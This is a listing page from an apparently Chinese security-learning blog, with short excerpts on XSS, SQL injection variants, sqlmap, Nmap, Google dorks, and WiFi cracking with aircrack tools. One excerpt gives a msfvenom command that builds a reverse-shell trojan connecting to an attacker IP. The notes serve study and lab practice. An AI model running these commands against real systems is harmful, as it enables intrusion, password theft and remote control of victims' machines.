- 博客(20)
- 收藏
- 关注
RSS订阅原创 XSS漏洞笔记
XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 xss 攻击。
2022-09-22 16:48:51
1118
原创 PHP PDO 连接操作数据库
为了提高效率和防止sql注入等安全问题,使用预处理令mysql服务先对sql语句进行编译,等待传入参数,那么接下来我们传入参数时将不会在编译,参数里的逻辑运算将不会再执行。:提取一条数据、提取多条数据,可设置返回什么样的数组(一搬为’PDO::FETCH_ASSOC’关联数组)。:准备函数,将sql语句传递给sql服务端进行编译,并且返回预处理对象。:执行函数,将参数传递给预处理并执行。:占位符,用来代表预处理的参数。:一个冒号,用来声明预处理变量。...
2022-08-16 19:12:46
2867
原创 PHP学习笔记
/ 常量:常量是一个简单值的标识符。该值在脚本中不能改变。(在整个脚本中都能使用) // 常量不需要加'$',设置常量的函数为'define()' /*语法define ('常量名','常量值',大小写敏感(可选)) // true为大小写不敏感,FALSE为大小写敏感,默认敏感.*/ @ define('name' , '张三' , true);// @用于屏蔽不必要的报错,可不加 echo name;// 因为我们第三个参数为true,所以变量名大小写不敏感,输出的值和name相同。...
2022-08-16 19:10:23
661
原创 SQL注入-HTTP头的一些注入
有时因为需要,会将客户的请求头中一些数据与数据库进行交互,比如用户的cookie,统计用户点击链接的来源referer,统计用户操作系统User-Agent,和用户的真实地址,忘记对其添加过滤,就造成了注入漏洞。...
2022-08-16 18:33:57
1517
2
原创 SQL注入-宽字节注入
为防止SQL注入,一般都会开启gpc来过滤特殊字符,但如果数据库设置字节解析与PHP不同,并试用了宽字节字符集,就会导致宽字节注入,从而逃避gpc。(GBK和Big5等)
2022-08-16 12:16:29
900
原创 SQL注入-二次注入攻击
二次注入漏洞是一种在 Web 应用程序中广泛存在的安全漏洞形式,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes或者是借助其他函数进行过滤,这些函数会在特殊字符前加\造成过滤的效果,但是\并不会插入在数据库中,我们输入的东西会原样储存到数据库中,虽然防止了一次注入,但如果可以二次使用该数据时,就有可能造成注入。二次注入通常存在用户注册->修改密码,邮箱注册->修改密码,文章添加->文章编辑。...
2022-08-16 09:26:34
492
原创 SQL注入-堆叠注入
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
2022-08-15 17:22:17
1530
原创 利用kali Linux破解WiFi密码
准备工具: 一:kali linux系统 二:外置无线网卡(需支持监听) 三:强大的密码字典第一步:设置无线网卡为(monitor)监听模式: ifconfig wlan0 down # 关闭网卡 iwconfig wlan0 mode monitor # 启动监听 ifconfig wlan0 up # 启动网卡第二步:开始监听:airodump-ng wlan0找到我们的目标(我手机热点),第三步:我们只需要记住目标WiFi的bssid与信道(ch)就行了,通过命令
2022-01-07 12:58:35
10678
3
原创 sqlmap基础
指令一览: 启动:sqlmap -h 指定url: -u /--url --batch 使用默认配置 -m 指定文件 -D 指定数据库 -T 指定表 -C 指定字段 -dbs 探测数据库 --tables 探测数据库表名 --columns 探测字段名 --user 探测数据库用户名 -r 指定http请求文件 --level2 指定探测级别 --technique=B 检测sql注入的类型 B:布尔盲注 E:报错注入 U:联合查询注入 S:注册表相关注入
2021-12-08 17:20:13
3347
原创 Burp Suite暴力破解网站密码
一、准备:1,靶场:个人选择DVWA。2,工具:Burp Suite。3,密码字典。二、开搞!:注:任何未经授权的渗透测试皆为违法,本文仅供学习,维护网络安全人人有责。一、打开dvwa暴力破解页面:...
2021-11-22 23:36:31
16906
5
原创 Metasploit中search命令
search命令用法老是忘,又很重要。命令:search [options]:<keywords>:查找,搜索。(可用关键字:name,rank(等级),path(路径),platform(平台),type(类型),cve)举例:一,后面直接跟上搜索内容:这种办法查找,将列出所有含有‘apache’字符串的。二,name关键字name关键字,将列出所有名字中含有apache的。三,rank(等级)关键字等级排序:excellent >great>good &g
2021-11-16 20:18:00
2955
原创 kali使用msf简单制作木马
命令:废话不多说,直接上命令:msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe命令分解: msfvenom #使用msf中msfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定p
2021-11-15 22:58:21
13020
7
原创 Google黑客常用搜索语法
搜索语法:``` site ---搜索指定域名有联系的url inurl ---搜索包含指定字符的url info ---查询网站的一些信息 link ---查询指定域名链接 intext ---正文中具有指定内容 filetype ---指定文件类型 intitle ---搜索标题中包含指定关键字的网页```举例:Site:搜索Site:www.baidu.com,会出现与百度有联系的url。inurl:搜索’后台 inurl:admin_login.php’,会出现u
2021-11-04 19:52:52
4825
原创 Nmap常用扫描命令
分解命令''' -v #查看冗余信息 -p #E扫描端口 -sS #半开扫描*** -O #扫描操作系统 --randomize-hosts #指定网段内随即扫描 --scan-delay #延时扫描,单位为秒 -A #完全扫描 -T4 #指定等级的时许扫描,共六个级别,等级越高,速度越快越不安全 -sU #UDP扫描 -Pn #非ping扫 -sn #ping扫(速度快,不安全) -F #快速扫 -traceroute #路由跟踪'''举例:列
2021-10-31 19:38:35
3429
原创 21年新版kali安装
第一步:官网下载kali镜像文件官网地址:www.kali.org访问kali官网,点击上方GET KALI,然后点击Bare Metal,(旁边的Virtual Machines是专门为虚拟机设计的,相比更为轻量,安装过程也比较简单,下载下来就是虚拟机文件,只需要VMware扫描一下虚拟机就可以了,这里只说Bare Metal版本安装)。选择版本下载镜像第二步:VMware安装kali镜像下载完成后我们获得了kali的iso镜像文件,接下来去VMware进行下一步操作。首先打开我们的VM
2021-10-27 00:03:44
10242
4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人